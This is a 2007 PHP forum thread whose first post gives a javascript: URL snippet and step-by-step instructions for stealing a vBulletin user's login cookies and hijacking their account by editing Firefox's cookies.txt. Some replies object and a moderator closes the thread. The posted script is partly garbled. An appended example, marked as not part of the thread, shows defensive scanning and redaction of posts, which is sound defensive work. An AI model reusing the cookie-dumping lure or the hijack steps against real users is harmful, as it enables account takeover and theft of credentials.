TalkPHP


Village Idiot 10-29-2007 02:14 AM

Never visit JS links on a forum, here is why
 
This sequence of things will allow you to hack a user's account; with a little practice I was able to do it in about half a minute.

Step one: Make a thread like this one, it looks innocent (the code in that is), but use this code instead (WARNING: VISITING THIS WILL COMPROMISE YOUR ACCOUNT SECURITY).
PHP Code:

javascript:R=0x1=.1y1=.05x2=.25y2=.24x3=1.6y3=.24x4=300y4=200x5=300y5=200DI=document.getElementsByTagName("table"); DIL=DI.length; function A(){for(i=0i-DILi++){DIS=DI].styleDIS.position='absolute'DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}document.getElementById('vB_Editor_QR_textarea').value=document.cookie;document.getElementById('qr_submit').click();setInterval('A()',50); void(0); 

This code will print out all their cookies from this site.

Step 2:
You wait till some sucker runs the JavaScript; check often. When it gets posted, copy the text into Notepad (not WordPad, to remove all formatting) and close Firefox.

Step 3: If you use Firefox, go to [Drive Letter]:\Documents and Settings\[User Name]\Application Data\Mozilla\Firefox\Profiles\[profile name]

Step 4: Edit the following values in cookies.txt with the ones on the notepad window (from the forum site, of course)
bbpassword
bbuserid

Save and close the window, re-open Firefox and you will be logged into their account.

I am working on a video for this, I will post it if I get it.

bluesaga 10-29-2007 10:34 AM

Interesting, I guess. I'm not sure if we condone this here and we may have to remove this topic. Hacking is hacking, whether you are advising people or not; this is showing people how to hack, not telling people how to not get caught.

obolus 10-29-2007 11:51 AM

errr... is this a joke? =o

Salathe 10-29-2007 12:33 PM

If a user is dumb enough to copy/paste the JS into their address bar and execute it, then you can have their account. :p On a more serious note, I don't see this as a problem since vBulletin just plain doesn't allow JavaScript to be injected anywhere. (that I know of)

Wildhoney 10-29-2007 01:21 PM

Quote:

*Blows a kiss to Wildhoney*
Such a classic.

cherries 10-29-2007 03:44 PM

You could just say it's the super popular JavaScript image "trick", it looks like it.

bluesaga 10-29-2007 04:07 PM

Erm guys, try what he has said lol. Copy the code into your browser, and it will make a post with your cookie details; all you then need to do is create the cookies with the exact same information and you have access to the account...

It works, just make sure you delete the post after :D

Village Idiot 10-29-2007 08:42 PM

Quote:

Originally Posted by Salathe (Post 3470)
If a user is dumb enough to copy/paste the JS into their address bar and execute it, then you can have their account. :p On a more serious note, I don't see this as a problem since vBulletin just plain doesn't allow JavaScript to be injected anywhere. (that I know of)

Correct, I tried a number of different methods and the only one is to put it in your URL bar.

Tanax 10-29-2007 09:29 PM

Where will this "cookie" be posted? :|

Village Idiot 10-29-2007 11:35 PM

On the thread the person who runs it is on. I've tried to do redirections, but it didn't work.

cherries 10-30-2007 04:20 PM

Code:

bblastactivity=0; bblastvisit=1193694492;bbthread_lastview=hash-stufff-%lulz%xD
something along those lines.

Village Idiot 10-30-2007 04:44 PM

All you need is the user ID and encrypted password.

Sam Granger 11-13-2007 10:29 AM

*removes cookie info*

Village Idiot 11-13-2007 03:20 PM

I hope you know it isn't edited in the email for everyone who is subscribed to this thread.

Wildhoney 11-13-2007 03:38 PM

Lol :) He tells us after everybody has tried it. Good going, VI, good going! Very sneaky.

bluesaga 11-13-2007 03:39 PM

Due to the security issues related to a thread like this, I have closed the topic. If you feel this should not have been done, please PM me.

Wildhoney 11-13-2007 03:45 PM

Good move. You probably want to log out and log back in for those who have tried this.
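Added example, not part of the thread and not vBulletin code: a server-side check a forum could run on a submitted post body before it is stored or mailed to thread subscribers, covering both the cookie dump described above and the point that the notification e-mail is not edited afterwards. The function name `scanPost`, its return fields and the sample values are assumptions made for illustration; the cookie names are the ones named in the thread.

```javascript
// Hypothetical moderation hook (added example). Treats the two cookie
// names from the thread as credentials that must never appear in a post.
const SENSITIVE = new Set(['bbuserid', 'bbpassword']);

// One "name=value" pair as it appears in a document.cookie string.
const PAIR = /\b([A-Za-z0-9_]+)=([^;\s]+)/g;

function scanPost(body) {
  const leaked = new Set();   // which sensitive cookie names were found
  const userIds = new Set();  // accounts whose credentials were exposed
  const redacted = body.replace(PAIR, (match, name, value) => {
    const key = name.toLowerCase();
    if (!SENSITIVE.has(key)) return match;      // leave harmless pairs alone
    leaked.add(key);
    if (key === 'bbuserid' && /^\d+$/.test(value)) userIds.add(value);
    return `${name}=[redacted]`;
  });
  // A post that carries a javascript: snippet reading document.cookie is
  // the lure side of the same problem; hold it for a moderator too.
  const lure = /javascript:/i.test(body) && /document\.cookie/i.test(body);
  return {
    leaked: [...leaked].sort(),
    userIds: [...userIds],
    redacted,                  // store and e-mail this, never the raw body
    lure,
    hold: leaked.size > 0 || lure,
  };
}

// Constructed sample input (values are made up).
const sample =
  'bblastvisit=1193694492; bbuserid=1234; ' +
  'bbpassword=0123456789abcdef0123456789abcdef';
const result = scanPost(sample);
console.log(result.redacted);
console.log('hold for moderation:', result.hold, 'accounts:', result.userIds);
```

Running the check before the post is saved matters because, as noted above, subscribers receive the original text by e-mail; the returned `userIds` tell the server which accounts had their login cookies exposed and need follow-up.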


All times are GMT.

Powered by vBulletin® Version 3.6.8